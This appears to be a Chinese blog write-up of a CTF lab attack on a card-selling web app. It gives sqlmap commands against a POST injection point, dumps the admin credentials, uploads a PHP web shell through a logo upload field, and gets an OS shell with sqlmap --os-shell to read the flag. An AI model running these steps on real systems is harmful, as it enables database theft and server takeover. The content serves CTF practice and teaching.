CTF实例题

1.靶机目标 http://117.167.136.244:28057
在这里插入图片描述
2.靶机为post请求即用burpsuite抓包
打开burpsuite
在这里插入图片描述
3.用burpsuite对靶机进行抓包
找到购买卡密
在这里插入图片描述
进行购买卡密
在这里插入图片描述
打开intercept
在这里插入图片描述
抓包成功

在这里插入图片描述
找到注入点如下http://117.167.136.244:28057/ajax.php?act=selgo
在这里插入图片描述

4.用sqlmap注入
(1)找库:sqlmap -u “http://117.167.136.244:28057/ajax.php?act=selgo” --data “tyid=1” --dbs
在这里插入图片描述
(2)找表sqlmap -u “http://117.167.136.244:28057/ajax.php?act=selgo” --data “tyid=1” -D faka --tables
在这里插入图片描述
(3)提示要在此"D:\Program Files\Python38\sqlmap\data\txt\common-columns.txt"路径下加上ayangw_k和ayangw_v字段
如下图
在这里插入图片描述
提示如下
在这里插入图片描述
加载如下即可结束
在这里插入图片描述

(4)sqlmap -u “http://117.167.136.244:28057/ajax.php?act=selgo” --data “tyid=1” -D faka -T ayangw_config --dump
成功找到后台密码pwd
在这里插入图片描述
用户名和密码如下:
admin :admin
pwd :MTIzNDU2

5.找到后台入口
由此进入:http://117.167.136.244:28057/admin/
在系统设置中首页LOGO配置中找到上传点
在这里插入图片描述

上传shell.php文件
找到文件存储位置
在这里插入图片描述
图片地址如图文件上传地址可能在logo.php文件
在这里插入图片描述
显示成功
在这里插入图片描述
6.用蚁剑连接http://117.167.136.244:28057/assets/imgs/logo.php
在这里插入图片描述
找到flag.sh
在这里插入图片描述
flag.sh提示在 /home/flag 中
在这里插入图片描述

成功找到flag
在这里插入图片描述
7.还可用shell找到flag
sqlmap -u “http://117.167.136.244:28057/ajax.php?act=selgo” --data “tyid=1” --os-shel
成功os-shell>
在这里插入图片描述
列表如下:
在这里插入图片描述列根目录如下ls /
在这里插入图片描述
发现flag.sh
ls /flag.sh
提示flag在/home/flag中
ls /home后找到flag
在这里插入图片描述
cat /home/flag后找到flag{64f0d856-62e5-457c-8601-2c5ff11295b2}
在这里插入图片描述

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值